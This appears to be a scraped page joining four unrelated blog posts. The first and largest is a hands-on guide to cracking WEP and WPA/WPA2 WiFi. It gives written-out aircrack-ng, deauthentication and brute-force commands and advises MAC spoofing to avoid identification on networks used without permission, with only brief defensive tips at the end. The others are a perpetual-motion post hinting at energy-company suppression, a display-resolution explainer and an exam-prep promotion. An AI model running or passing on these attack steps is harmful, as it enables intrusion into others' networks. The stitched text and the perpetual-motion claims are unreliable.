How to Hack Wifi (and how to avoid being hacked): WEP/WPA/WPA2

This guide is meant to show how easy it is to hack wireless networks if the proper security measures are not in place. First I will show how to hack a WEP or WPA/WPA2 Network and then I will give tips on how to avoid getting hacked.

This is important information in our techno-savy culture. If your wireless network is compromised you can be liable for any illegal activity on it. There are numerous stories of child pornographers and black-hat hackers using other peoples wireless networks.

NOTE: Hacking your neighbors or anyone else’s Wifi without their permission is ILLEGAL. Be smart!


Step 1 : What you Need

-A Computer. (A Laptop works best)-A Wireless Card capable of packet injection.
-If your laptop wireless card can’t do packet injection you can purchase a wireless adapter such as the Netgear WG111 v2 for around $8-$12 on eBay.

-A Live installation of BackTrack either on a CD or USB stick.
-BackTrack 5 Can be found Here
-Create a Live USB Install Here


Step 2 : Hack WEP

WEP is the predecessor of WPA and has been hacked for the past 5+ years yet people continue to use it. With the instructions below we can crack WEP in under 15 minutes.You can crack WEP from the command line but there is an easy GUI interface in backtrack which makes it a much less painful experience for those who are scared of command prompts.

1. Boot into BackTrack

2. Click on the Backtrack applications menu -> Backtrack -> Exploitation tools -> Wireless exploitation -> WLAN Exploitation -> gerix-wifi-cracker-ng (This will open up the GUI interface seen in the picture).

3. Go to the configuration menu and select the wireless interface wlan0
-Click on Enable/Disable Monitor Mode (this will put the wireless card into monitor mode).
-Select the newly created mon0 interface.

4. Now click on the WEP tab at the top of the window.
-Click on “Start sniffing and logging” and leave the terminal open.
-Once the wireless network you want to crack* shows up (it has to be WEP encryption of course) select the WEP Attacks (with clients). *note that the PWR has to be high enough to work so the closer you can get, the better.
-There you click on “Associate with AP using fake auth”, wait a few seconds and click on “ARP request replay”.

5. Once the Data number reaches over 10,000 you are ready to try (if the data is coming fast wait until 20 or 30,000 to be safe) and crack the key, but don’t close any windows yet.
-Go to the cracking tab and click on “Aircrack-ng – Decrypt WEP password” under Wep Cracking.

It will take a few seconds to minutes to crack the password and then you are good to go.


Step 3 : Hack WPA/WPA2

At least WPA and WPA2 are safe right? Wrong. WPA and WPA2 are both crackable but the time it takes to crack depends on the strength of their password.-Boot into BackTrack
-Open up Konsole which is a command line utility built into BackTrack. It is the Black Box in the Lower-Left Hand Corner (See Image).
We will now be entering the following commands into the command line noted by Bold as well as explanations as to what they do:

-The following commands stop the wireless interface so you can change your mac address, this is important because your mac address is a unique identifier so faking one is a good idea if you are accessing a network you don’t have permission to. (which by the way I wholly condemn)

1:
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger –mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0

2:
-Now we will put the airodump-ng tool into monitor mode, this will allow us to see all of the wireless networks around us (See the first Picture).

airodump-ng mon0

Now choose the network you want to hack and take note of the BSSID, and the Channel it is one as well as the ESSID. The PWR has to be fairly high to be able to hack it, this is determined by how close you are to the wireless router. The closer you are, the better.

Once you have chosen the wireless network enter the following into the terminal:
This will write capture packets and put them into the “filename” file, we are trying to capture the handshake between the router and wireless connection which will give us the key we need to crack.

3:
airodump-ng mon0 –channel * –bssid **:**:**:**:**:** -w filename

The following step is optional but is highly recommended as it will speed up the process a great deal.

Once “WPA handshake: **:**:**:**:**:**” appears in the top right-hand corner we can move on. If you are having trouble getting the WPA handshake to occur then do step 4.

4:
aireplay-ng -0 1 -a **:**:**:**:**:** -c **:**:**:**:**:** mon0

What this step (4) does is it deauthorizes a wireless connection and trie to re-establish it so it will generate a new handshake to capture. This step ends once you have captured the handshake.

5:
aircrack-ng –w wordlist.lst -b **:**:**:**:**:** filename.cap

Step 5 is now trying to crack the password in “filename.cap” using a list of words, here called “wordlist.lst” you can download a good 200 million word dictionary here (128MB but unzipped is 800MB).

Your computer has to compute the hash value of every password in that list but a computer can go through those 200 million passwords in 6-12 hours.

6.

If the password isn’t found in the dictionary you can try and brute-force the password with this command: (Note this could take a very long time depending on their password strength).

/pentest/password/jtr/john –stdout –incremental:all | aircrack-ng -b **:**:**:**:**:** -w – filename.cap



Step 4 : Secure Your Own Wireless Network

Hopefully you gained some insight into how to not get your own wireless connection hacked:

1. Use WPA2 (WPA2-AES) if available and by all means never use WEP.
2. Don’t base your password on a dictionary word. The next section focuses on passwords in general.
3. In your router settings you can usually hide your ESSID (the name of the wireless network) this will add a small layer of security.
4. In your router there is probably a mac-address filtering service where you can specify the mac addresses that are allowed to connect. This will make sure that only your approved devices can connect to your network. (obviously a problem though if you have a guest over and wants to connect to your Wifi).

World’s First Perpetual Motion Machine?

Since at least the 12th century, man has sought to create a perpetual motion machine; a device that would continue working indefinitely without any external source of energy.

A large scientific contingent thinks such a device would violate the laws of thermodynamics, and is thus impossible.

Could it be that as a race, we don’t fully understand the laws of physics and such a device may indeed be possible? What would the ramifications be if we could actually build a perpetually moving device?


Norwegian artist and mathematician Reidar Finsrud is an outside the box thinker that has devised a machine that he believes achieves true perpetual motion. Take a look at the video below and see what you think.




The dream is that if we’re able to produce perpetual motion machines, that we’d have tapped into the holy grail of sustainability: an infinite energy source.

A device that requires no input to run that could be affixed to a generator would harvest free energy to power whatever we so pleased. This is obviously a dangerous and controversial idea due to the amount of money being made by energy companies around the world.

What are your thoughts? Do you think Finsrud has created true perpetual motion?

Graphic Display Resolutions – What Do The Numbers, SD - HD Ready - Full HD, 720p versus 1080p - 1080i Mean?

Graphic Display resolutions can be a rather cryptic business, with multiple standards used to describe the same display resolution in 10 different ways. All of those technical terms tend to change based on the display’s purpose (television versus computer monitor) and even your region (the meaning of HD Ready).

Previously, we talked about 7 Important Things To Know When Buying an LCD Monitor, the difference between full HD and HD Ready and even how Apple’s retina display works. Today, we’ll help you make sense of the different terms people tend to throw around when describing display resolutions. When buying a computer monitor or a TV screen, it can be incredibly useful to know what those numbers mean. Not just to differentiate between two displays, but also to determine what kind of display you should be looking for.

Width x Height

The easiest convention is the one that’s used to describe the maximum resolution of computer monitors. A lot of laptop displays have a maximum resolution of 1280×800, and the resolution of larger computer screens often go into the neighborhood of 1680×1050.

These numbers describe the width and height of the display in pixels – the building blocks of your display. Some displays have different pixel densities (most famously, Apple’s retina displays), meaning the physical size of two displays with the same maximum graphic display resolution is not necessarily uniform. But the actual resolution (that is, the amount of available building blocks to construct a picture) is unambiguous.


SD, HD Ready Or Full HD

The difference between SD and anything with ‘HD’ in its name is simple. SD – or Standard Definition – is usually used to indicate television displays that are not 720p or 1080p High Definition screens, or 480p Enhanced Definition screens. More generally, the term SD display is used to indicate 576i displays in the PAL and SECAM regions, or 480i displays in the NTSC region.

Full HD is used to describe 1080p displays. The difference between HD Ready and Full HD is more ambiguous, and depends on the region. For more information, read Matt’s article on The Difference Between HD Ready and Full HD.

If some of the words used above made little sense, don’t worry. We’ll explain the meaning of 720p and 1080p in a bit, as well as the difference between 1080p and 1080i (progressive versus interlaced) displays.


720p versus 1080p or 1080i

Modern televisions are often described using terms like 720p and 1080p, or 1080i. The number at the front of the term indicates the lines of vertical resolution. Thus, 720p and 1080p have 720 and 1080 lines respectively of vertical resolution. Both 1080p and 1080i screens have 1080 lines of vertical resolution (we’ll explain the difference between these two below).

To compare the resolution of these displays to the width x height notation of computer displays, we can glean the lines of horizontal resolution from the aspect ratio. For example, a 1080p display with a conventional 16:9 aspect ratio has 1920 lines of horizontal resolution, meaning a 16:9 1080p screen has a resolution of 1920 x 1080 pixels.


1080p versus 1080i, or Progressive versus Interlaced

The difference between 1080p and 1080i, or rather the difference between progressive and interlaced displays comes down to how the image is displayed.

Progressive displays use frames. One frame is one completely rendered image. If you press pause while watching a video, you’re looking at a single frame. If a progressive display is said to have 25 frames per second, that means it renders 25 distinct images every second.

Interlaced displays works very differently. Instead of refreshing the entire picture, it refreshes half the lines in the picture. It’s meaningless to talk about frames per second, because an interlaced display never displays a ‘complete frame’. Instead, we express the refresh rate in fields per second, in which one field contains half the lines of the display.

In an ideal, theoretical world, progressive would always be better than interlaced. However, there are a few problems with that thought. Progressive displays don’t have the same refresh rate as do interlaced displays. Although interlaced displays only render half the lines on the displays with each refresh, it refreshes twice as often as the equivalent progressive display, and each of these fields is part of a distinct snapshot. On top of that comes the fact that television broadcasting uses interlaced video.

All this makes interlaced pictures more fluid in motion than the equivalent deinterlaced pictures. On the other hand, progressive pictures are more easily scaled, paused and edited – which makes the image more adaptable with less loss of quality.

What other specs do you look at when shopping for displays? Let us know.

IBM Certification Exam 000-001 the First Step in Applying Maximo Enterprise Asset Management Solutions


The IBM 000-001 certification exam is the first step testing your knowledge of the fundamentals of Applying Maximo Enterprise Asset Management Solutions V2 in a client's environment. The exam tells IBM how well you will be able to identify opportunities and to influence key personnel.

The test, which is associated with the IBM Certified Solution Advisor certification, lasts 60 minutes and has around 43 questions. A passing score is 65. There are six sections on the IBM 000-001 exam. Thorough preparation is essential; you should find a quality, online testing prep service like TestsLive.com that offers practice exam procedures.

Here are the six sections and a brief summary of what they each entail.

Section 1: Current Architecture and Environment: In this section, you will be asked to fully comprehend a customer's technical environment by analyzing his architecture, including networking hardware, software and security.

Section 2: Business Drivers: You must have a thorough grasp of the theories of Enterprise Asset Management to pass this section.

Section 3: Functional Requirements: You will be asked to identify key areas of the customer's business methods that relate to Enterprise Asset Management.

Section 4: Reporting Requirements: This sections tests your knowledge of EAM reporting options.

Section 5: Integration and Interfacing Requirements: Migration and Integration strategies are tested, specifically how to move the client to the proposed IBM EAM solution.

Section 6 Customization: Your knowledge of tailoring tools will be tested here, as well as your ability to explain it to the client.